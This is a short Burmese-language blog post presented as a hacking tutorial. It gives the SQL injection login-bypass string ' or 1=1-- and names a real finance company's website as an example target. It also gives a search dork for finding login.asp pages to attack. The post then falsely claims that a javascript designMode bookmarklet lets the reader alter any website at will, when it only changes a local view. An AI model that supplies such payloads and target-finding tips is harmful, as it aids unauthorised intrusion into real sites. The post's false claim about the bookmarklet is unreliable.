ဒါကေတာ့လုပ္တတ္ရင္လြယ္ပါတယ္ sql injection တိုက္ကြက္ကိုသံုးျပီးဟက္မွာပါ
sql injection code ေလးပါ
' or 1=1--
ဥပမာ ကိုယ္ဟက္ခ်င္တဲ့ဆုိက္ကဒါေလးေတာ့
http://www.sundaramfinance.com/
သို့မဟုတ္
google.com as---> site:com_inurl:login.asp လို့ေရးပါ
ျပီးရင္ ok
ေနာက္တစ္နည္းကေတာ့
ကိုယ္ဟက္ခ်င္တဲ့ဆုိက္လိပ္စာေလးကိုရိိုက္ပါ
http://www.sundaramfinance.com/ ကၽြန္ေတာက္ဥပမာေလးနဲ့ေျပာတာေနာ္
ရိုက္ျပီးသြားရင္ အေပၚကဆိုက္လိပ္စာေလးကိုဖ်က္ျပီးေအာက္ကcode ေလးကိုကူးျပီးအဲဒီေပးCtrl+V လုပ္ေပးလိုက္ပါ ဒါဆိုရင္ေတာ့ဒီဆုိက္ေလးကိုမိမိစိတ္ႀကိဳက္ကလိလုိက္လို့ပါတယ္
javascript: document.body.contentEditable = 'true'; document.designMode = 'on'; void 0
ျပီးရင္ေတာ့ဘာျဖစ္မလဲႀကည့္လိုက္ေနာ္ ကို္ယ့္စိတ္ႀကိဳက္လုိက္ျပင္လုိက္ေပေတာ့သယ္ရင္းတို့ေရ
No comments:
Post a Comment